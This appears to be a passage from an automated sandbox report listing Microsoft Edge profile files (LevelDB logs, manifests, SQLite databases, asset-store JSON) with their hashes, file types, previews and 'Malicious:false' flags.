                                                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.246147573355154
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NdFRs1N723oH+Tcwtp3hBtB2KLlbcL+q2PN723oH+Tcwtp3hBWsIFUv:ReaYebp3dFLLvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                        MD5:235F3C8BF96A636E20E5AEBBA67DDB98
                                                                                                                                                                                                                                                                                                        SHA1:F6BAF8D2ABA4B3355AA71F3B00E1E3DB3DD8FB29
                                                                                                                                                                                                                                                                                                        SHA-256:6041D1D688343D18A2B2F1AC552EAB33A24DFB54B08802AF3AD7D466A5D0CA58
                                                                                                                                                                                                                                                                                                        SHA-512:0375302703E9525506152AABCEF01C06088E9850AC6DA0D49D81C140BCD258F81C25A79EC7349706AF11719BBA1A648B9D65CD5CDC409D8D6D09E6E9751A3950
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.372 678 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/24-13:28:24.402 678 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222864168158029
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IbPMZpVdfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVdfx2mjF
                                                                                                                                                                                                                                                                                                        MD5:645AACC90F695FFABD8B388E7F1542FA
                                                                                                                                                                                                                                                                                                        SHA1:EFD4A7B203CA7207605E147332C0D6643FB0F09D
                                                                                                                                                                                                                                                                                                        SHA-256:C0933F24BB478CE8A4DC498EEBD1D50FECF1F510A4731C251F66A23D97224110
                                                                                                                                                                                                                                                                                                        SHA-512:D5EB15378D64710ECC5D3A2C1DAA5A1A05BA610557D83A464588B4D57BA2512B830803C4580179907DFBD96A81365DAD8C4C44B5B00279649439856E2F81340C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.120770571085677
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXt+q2PN723oH+Tcwt9Eh1tIFUt8EqwZmw+E3VkwON723oH+Tcwt9Eh15LJ:ivVaYeb9Eh16FUt8/w/+c5OaYeb9Eh1H
                                                                                                                                                                                                                                                                                                        MD5:4339EE0D1F9FECBAE97CA35C2D178A50
                                                                                                                                                                                                                                                                                                        SHA1:E14ACB0DE69ED88589E7961D9253024F8B72380C
                                                                                                                                                                                                                                                                                                        SHA-256:C1E7536A4A83F997DADCCE55863B8B1636707662EFBA2CE1D965037CE6B8E92E
                                                                                                                                                                                                                                                                                                        SHA-512:2CDC6AE0988CA932FDD05C906DA14A58360CC5E651E5964127FD66274E00B702427A5C0D04BFCF39C96C3255CE91F4B40BA75FD50483803326279A0DACC4B285
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.153 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/24-13:28:24.168 3f8 Recovering log #3.2024/12/24-13:28:24.227 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.120770571085677
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXt+q2PN723oH+Tcwt9Eh1tIFUt8EqwZmw+E3VkwON723oH+Tcwt9Eh15LJ:ivVaYeb9Eh16FUt8/w/+c5OaYeb9Eh1H
                                                                                                                                                                                                                                                                                                        MD5:4339EE0D1F9FECBAE97CA35C2D178A50
                                                                                                                                                                                                                                                                                                        SHA1:E14ACB0DE69ED88589E7961D9253024F8B72380C
                                                                                                                                                                                                                                                                                                        SHA-256:C1E7536A4A83F997DADCCE55863B8B1636707662EFBA2CE1D965037CE6B8E92E
                                                                                                                                                                                                                                                                                                        SHA-512:2CDC6AE0988CA932FDD05C906DA14A58360CC5E651E5964127FD66274E00B702427A5C0D04BFCF39C96C3255CE91F4B40BA75FD50483803326279A0DACC4B285
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.153 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/24-13:28:24.168 3f8 Recovering log #3.2024/12/24-13:28:24.227 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4630702811505476
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5/ll:TouQq3qh7z3bY2LNW9WMcUvBu7l
                                                                                                                                                                                                                                                                                                        MD5:EFB6B54255FCE068F6FF2388D43A4262
                                                                                                                                                                                                                                                                                                        SHA1:5CA2A93FA1F204CA8CD7F7E7225BC367C8C0A280
                                                                                                                                                                                                                                                                                                        SHA-256:EE2DAB95993CFEA8BEC385C99468F8E997DF0490D3FEFDA70E0B13761758C542
                                                                                                                                                                                                                                                                                                        SHA-512:985F64AB4B182CB1B91E6BA0979D1BAF0547D854B7DD937B30CB1FDB1E7DF9B7170F899EF7EB6B2C3FB43C0FF47AC133FA4005F9E198129B40D80BDD1E5ABC08
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.223610386278223
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXv33+q2PN723oH+TcwtnG2tMsIFUt8EXvcFVZZmw+EXvcFVNVkwON723oH+Tcwj:ZmvVaYebn9GFUt8KEN/+KE/5OaYebn9b
                                                                                                                                                                                                                                                                                                        MD5:51A748BA5E746FD23726921272777C16
                                                                                                                                                                                                                                                                                                        SHA1:1271394B88E0FB1112293C18D2032DDE89EB4B41
                                                                                                                                                                                                                                                                                                        SHA-256:68DA08D443CB1A11F40C687DD9F3CBBCFD7BD4CB979221691C28C1D92D09255D
                                                                                                                                                                                                                                                                                                        SHA-512:F295082FC79D0AB42E15C0D3E7BCC061E1834540FC7FB9BDA45DEC322512282869B9245FB772F07A6D200C3BEDF63145A955C0807739751D0CE238B83A971D24
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.798 17d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/24-13:28:19.799 17d8 Recovering log #3.2024/12/24-13:28:19.799 17d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.223610386278223
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXv33+q2PN723oH+TcwtnG2tMsIFUt8EXvcFVZZmw+EXvcFVNVkwON723oH+Tcwj:ZmvVaYebn9GFUt8KEN/+KE/5OaYebn9b
                                                                                                                                                                                                                                                                                                        MD5:51A748BA5E746FD23726921272777C16
                                                                                                                                                                                                                                                                                                        SHA1:1271394B88E0FB1112293C18D2032DDE89EB4B41
                                                                                                                                                                                                                                                                                                        SHA-256:68DA08D443CB1A11F40C687DD9F3CBBCFD7BD4CB979221691C28C1D92D09255D
                                                                                                                                                                                                                                                                                                        SHA-512:F295082FC79D0AB42E15C0D3E7BCC061E1834540FC7FB9BDA45DEC322512282869B9245FB772F07A6D200C3BEDF63145A955C0807739751D0CE238B83A971D24
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.798 17d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/24-13:28:19.799 17d8 Recovering log #3.2024/12/24-13:28:19.799 17d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6129194872972638
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j8jxp9jI4mL:TO8D4jJ/6Up+Ah2
                                                                                                                                                                                                                                                                                                        MD5:9E09DCE4692F935167B522C5C9890311
                                                                                                                                                                                                                                                                                                        SHA1:733966A04DCE4FE044E4BD4BFFE254D962CB0256
                                                                                                                                                                                                                                                                                                        SHA-256:1CCF1076E897A26A02B02D17EB73302C2F1F80344B5CAD7C0B1A3311DC03F541
                                                                                                                                                                                                                                                                                                        SHA-512:D2207D359F25CB00FF24DC3E438B8F7D9DAB179285116519EE85F560D7BA80962B8C8D37A1AE0804E17EFB520EE71056E786933744748F6CEA3E8468F9764C65
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.35414129061542
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6144:hA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:hFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                        MD5:93A4A8D46402D081934CCFD0CBEB0DD7
                                                                                                                                                                                                                                                                                                        SHA1:ABCEFCCEF3B8EBC6566BCFCD56B56BC96F81EE50
                                                                                                                                                                                                                                                                                                        SHA-256:1682DFCC1CA505142C4573F8FCAAAAF1F51235D670C42690A2F3825A8D44223D
                                                                                                                                                                                                                                                                                                        SHA-512:75224A33A1D7ADBFE63B3481AB99051C0C4952ED8C832802A52181615FE5605F12148979F7126351862A3C31ECF9F9F5644C5E32967516B6FAF88CF71375A8ED
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.P..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379538507720676..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):313
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.152000266711855
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NBq1N723oH+Tcwtk2WwnvB2KLlbI4q2PN723oH+Tcwtk2WwnvIFUv:yaYebkxwnvFL64vVaYebkxwnQFUv
                                                                                                                                                                                                                                                                                                        MD5:1B00ADEB5DF709C03F6C241B83B8EE13
                                                                                                                                                                                                                                                                                                        SHA1:652EA4B86458D318A92F84BBA05D78DCD5E15148
                                                                                                                                                                                                                                                                                                        SHA-256:04447491454548850AFD0EC03D21878074E3D5DACB79256FABBDFDBFCB18666D
                                                                                                                                                                                                                                                                                                        SHA-512:842E665C1D6E6C3557CACB36EEA0C79FF2F2B22C749409504D6FE5071C8FE43BC91F1875E940DA6226A26952A711126EFDE1297D1C9833CCA5DBD1458F1C937D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.171 790 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/24-13:28:24.216 790 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324606766763443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ra:C1gAg1zfvi
                                                                                                                                                                                                                                                                                                        MD5:89689A5BACC6BCA1624E2166C9D49053
                                                                                                                                                                                                                                                                                                        SHA1:A8A6629D837E86D60995D44F7CDE41F3AB1D3243
                                                                                                                                                                                                                                                                                                        SHA-256:BCEA93792E008533692D815767A1174AE6878AE147F6CD5DDDB2E423CACD43CF
